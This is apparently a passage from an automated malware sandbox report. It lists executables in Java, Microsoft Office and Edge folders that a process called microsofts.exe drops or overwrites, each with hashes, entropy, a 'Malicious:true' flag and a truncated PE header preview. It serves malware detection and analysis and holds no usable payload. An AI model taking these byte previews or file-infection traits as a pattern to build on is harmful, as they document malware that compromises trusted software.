                                                                                                                                                                                                                                                                                                          SHA-256:EC0A612B0653F623FD46EFB52D34CCAB98CA91BC3E1F5785EA0D26113DFEC7FC
                                                                                                                                                                                                                                                                                                          SHA-512:AECE8ECA9DB67AD5F5EAAB890B86DC62ED8DF04EE28E7B009A9356A47203414C03452E6148340E91AE4D158E999427914EC5F50E369E2F80CDEB9DDFCFB510AC
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@................................./...........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1142784
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.032304867878162
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:9KQBXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:susqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:EC8A7ABF118F7A1D7A3DC9CA2A2ADE25
                                                                                                                                                                                                                                                                                                          SHA1:869762F7E280FEBF9A8962A36C183D5CFE093E28
                                                                                                                                                                                                                                                                                                          SHA-256:2FA543721DAB8055E7DD05CE30DCBBF115F6EA81B98DACC3B2AD40C7B3D02A6C
                                                                                                                                                                                                                                                                                                          SHA-512:76E8C26663461E33F55198F0E62F98DBCB8939D3D2C5C7DE5C818FAA3721DDF5752D577D70D6A7E1A2F8B97C1A0DBA49EFFDB4BB03AA5F39F4E81D9781F7C57F
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..................................*.......................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1298944
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.24909661212226
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:4i7l/3roAHsqjnhMgeiCl7G0nehbGZpbD:rl/roAbDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:0514E8BAD386398DBB3CB78FDC2657EE
                                                                                                                                                                                                                                                                                                          SHA1:56716809FD23491E1DA844C822F935D01C81C1A7
                                                                                                                                                                                                                                                                                                          SHA-256:A8721575863C408F9FD66F3C933F5A333121D3EAC248A558D25926FE4FF3999E
                                                                                                                                                                                                                                                                                                          SHA-512:E1F76B287E8B528A44D5AA991B571B7241175B8C0A39F6D74A0654B10B2BB46D077A15487EB3A72BBF35F091233BDFC5D285ED4DCFEC1C504A463245A83341ED
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0.......F..................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1269248
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2868782787873005
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:p5bfQnLXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pNfQnLsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:62BF2DBE6907BE7A7CBE8FF8B2F17CA6
                                                                                                                                                                                                                                                                                                          SHA1:9A68376A94B5427CBBF63D3BB82EEDCE7A4FB189
                                                                                                                                                                                                                                                                                                          SHA-256:783DE4DD7EF07146E26613862608626202498638F2F35D5FFF147FFCC6807F19
                                                                                                                                                                                                                                                                                                          SHA-512:A975194B64E46D5EAAE2693D2FABADB188DA1FDD7C270318D093D2791F67E89BFE53724E9359615D807991666435973EFB52F5B78005F1FF11A8E1B4A1B3D48A
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@.................................Z{......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1287680
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.303347115520988
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:0Nmt0LDILi21gXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:LLifsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:418B9A0B9E8B7E69845D69C8C047D863
                                                                                                                                                                                                                                                                                                          SHA1:221E619886326D58DBB5AA43B051F252D494595A
                                                                                                                                                                                                                                                                                                          SHA-256:C665DBBF005FD86AAB9564781A9279C8345D6C40A6F53635EBA1190D35C89AFB
                                                                                                                                                                                                                                                                                                          SHA-512:1F889E3FCA60A29DCE3B7B3310D87297B4BAA9A3CB3F5FC73784B710995215DA8B68716CA2C78591B3F251325DCA98174FFA6341E299F82E5AA6D6E0B5F67549
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................i............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1287680
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.303329405718473
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:kNmt0LDILi21gXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:bLifsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:15E8677B2FB948DA769AA6FC302E3199
                                                                                                                                                                                                                                                                                                          SHA1:3A8B2C38D2802E1FE40A6B6B53AD800D705E68C6
                                                                                                                                                                                                                                                                                                          SHA-256:6F30638882D407BDB9CB05381BE5A61E5A6D961130D80DE031EA0271AF638F24
                                                                                                                                                                                                                                                                                                          SHA-512:565D7D287A87251F40A73876B2C622B33EECA909ACD04DA8DED3857E79E0E5A97467B29D6278FF91AFE6704A7E7D0B8BB6D80F483B90B140AADA3F37858878CE
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..................................A........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1343488
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2360300770987305
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:cjuozQMGNUbTjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:IffsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:74C867E737A41B7326DEFEF2C82D1C87
                                                                                                                                                                                                                                                                                                          SHA1:98E0D8B04D9CC058095E063D1E8951130FE91470
                                                                                                                                                                                                                                                                                                          SHA-256:2593293E3EE247CB0455BAE03B45B9F95A3EF2F304F82DA840CBC354B9765C85
                                                                                                                                                                                                                                                                                                          SHA-512:0A8AF47A340E66856AEEC39C72A1E93D3513E6330C748DED1FA8B3D852E56A2EBFF59D22D20B4A35B7537AD676DB2B060910492090C4497AB4402E547CE819DD
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@....................................^O.... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1496064
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.577922916543942
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:+bUO42i/EasqjnhMgeiCl7G0nehbGZpbD:+JuDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:444DF866FF9A780BCD4F7656A6374E26
                                                                                                                                                                                                                                                                                                          SHA1:20ABC459B33130DC1D1A6E68C82BFDD23742E6EA
                                                                                                                                                                                                                                                                                                          SHA-256:54AF2DA4C23F543639E0719F32A24EEEE4EF5199486B2E4058807FB37E06C796
                                                                                                                                                                                                                                                                                                          SHA-512:F6B13350DD750A72D9682D13116F026E9FE9229D4287FDB0FA575B773551FB4B915A867F896EAE83C277D0CC4805B8BC055622E6DEC27E4BB3989D81C906FF7E
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@.......................... ................... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):52712960
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.961838857216427
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:1572864:DLjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:ricZmsR3Lo/cnLe
                                                                                                                                                                                                                                                                                                          MD5:2853DA19D680FF6383DF6EE67686B5F4
                                                                                                                                                                                                                                                                                                          SHA1:7166DE0F33F9470CF8032B6B1F1C96BD8C6A45F5
                                                                                                                                                                                                                                                                                                          SHA-256:2ED90A74B466E2F39FEC6618570C80ECC7E3A6A3A4519A97FCA4A1D6974C994B
                                                                                                                                                                                                                                                                                                          SHA-512:9AB853CFFF838AB4E67C234B3C6EF6F7B728B65C980C19EFC26B53C2744DC79FEF1A88A8E8347A6C68B4B88E40AC218FB3AAB4551173FED1B9132693926E544D
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$......N%..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1657344
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.635124814803286
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:QE8DMeflpnIOvYU7sqjnhMgeiCl7G0nehbGZpbD:QtDD9pnIOdDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:6B2BD5C37388DD54BD0565BB903C1591
                                                                                                                                                                                                                                                                                                          SHA1:6FAE382ECF7391AB7E2C7B2A9CC416B2977BF76D
                                                                                                                                                                                                                                                                                                          SHA-256:A15AAFF0F5FE2B813579B3291913B22800DC136A5310B0197B8C6DF700C13A8B
                                                                                                                                                                                                                                                                                                          SHA-512:F8CB70E7CED0942A1D04FECDAE91BA55FAF55C533C217BEFA6C783FAFB9FD1526FA3BAC7E09D20B7E6184B1CAFA246C44CA851202E6927D0D3785D944A419119
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@.......................................... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):4364800
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.748476671368598
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:wB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EODmg27RnWGj:6HzorVmr2ZkRpdJYolAD527BWG
                                                                                                                                                                                                                                                                                                          MD5:BE3D48CD458A2EEBD2B76ED700A42DFC
                                                                                                                                                                                                                                                                                                          SHA1:26DEB4C4A20F794B45263889B12A2A93277481D0
                                                                                                                                                                                                                                                                                                          SHA-256:A67FE3B031736E93D0793D8DD9FF877B046523D52044B13EE1B078796D8B62A1
                                                                                                                                                                                                                                                                                                          SHA-512:0353809DFE0A2363F3008B5DB33E2A28CC950EAD109B24480638C15B0AE44FDDB375B86E86A3E7FD800C0E074C01C13BB20CDE8180FD46575DC9A4D150894FCC
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD......C... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1238528
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1469295714519125
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:g3w1uVdSEjpXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:gEyTpsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:F7896D2318B44E8BF0AB13B0F3C25F3D
                                                                                                                                                                                                                                                                                                          SHA1:FA11D67BC331CB5586DEE278716EF3BDA7825460
                                                                                                                                                                                                                                                                                                          SHA-256:B8BFA3E1C942C7AFC8E68AE5CD857A8020A5A0B1141BDACADE8D57395FD49A18
                                                                                                                                                                                                                                                                                                          SHA-512:68F8935C5FAB146EB61DD979A06C9110B03585C35A56D284927D6DAD59BDDD8ED65823AE3B38858337DF03435EE35E1C9489F0EB1EFA7B84F35E6A890DDC5A59
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P............ ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2354176
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.049962599993485
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:ShDdVrQ95RW0YEHyWQXE/09Val0G0Dmg27RnWGj:ShHYW+HyWKbD527BWG
                                                                                                                                                                                                                                                                                                          MD5:AC37DAB395406B7A2E223F34625726DE
                                                                                                                                                                                                                                                                                                          SHA1:DB5FAF5F4D426CDDA76D0F4C9997F51D9AB35860
                                                                                                                                                                                                                                                                                                          SHA-256:CD220B06304BADD00AF5E3B4CEFF37F7799FD7DCE24C9D5DFDB822276A4FD34B
                                                                                                                                                                                                                                                                                                          SHA-512:E4FBA17DC6B560C3FD4BA791854CB3B0F7353EE55FC944749F801AADB176A44B49B0FE766D5D61B628641D6D0EF1469D8C696312DD4EE561E44415BE24DCADA2
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%......'$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1825280
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.158486131612212
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:J70E0ZCQZMiU6Rrt9RoctGfmddqsqjnhMgeiCl7G0nehbGZpbD:N0EzQSyRPRoc1SDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:47F7C460DD0D82FD87D1B4685F68585A
                                                                                                                                                                                                                                                                                                          SHA1:1E16C3185BA4DFE54973A27EC38003BA74026475
                                                                                                                                                                                                                                                                                                          SHA-256:4A5F098B62F020D3065A6C8D096121D242D1F3303F785E3287A591852123AC56
                                                                                                                                                                                                                                                                                                          SHA-512:3AC9F2A707754D3CDACF6A475BCB3B9C967999289962047AFC98347EAF95B160392726A659FD6EB07DAF3A03722856397630B6B4AA8214E62200D67CCC4B8638
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0............ ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1847808
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.145472801658465
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:fiD2VmA1YXwHwlklb8boUuWPg2gVsqjnhMgeiCl7G0nehbGZpbD:aD2VmAyiwIb8boQuDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:F7B82C5E3C75E110D966EA925FB02833
                                                                                                                                                                                                                                                                                                          SHA1:B0FB4BA996F569B9B1EC43044C7F2D00EFA67B74
                                                                                                                                                                                                                                                                                                          SHA-256:913EF2A4D8D6FE49866932B7DA4472DE9BBD02A13E3E5F14E4B93C60A70928F6
                                                                                                                                                                                                                                                                                                          SHA-512:FAC9798AB717B6E39CDD5162A850C4FBE7144FB7D9AEEBDBA2E67B165DF2D1F11DC310606FB14838B9243700AAE041365F0A234845BA3AF0CC096918A37248BA
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2853376
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.95073771974498
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:IfD3zO9ZhBGloizM3HRNr00WDmg27RnWGj:CDaalxzM00WD527BWG
                                                                                                                                                                                                                                                                                                          MD5:76CEACA54807C2960E7751EB6AE4B785
                                                                                                                                                                                                                                                                                                          SHA1:EAF5375FB9CCF6093F6625B8830475B2F2102CF1
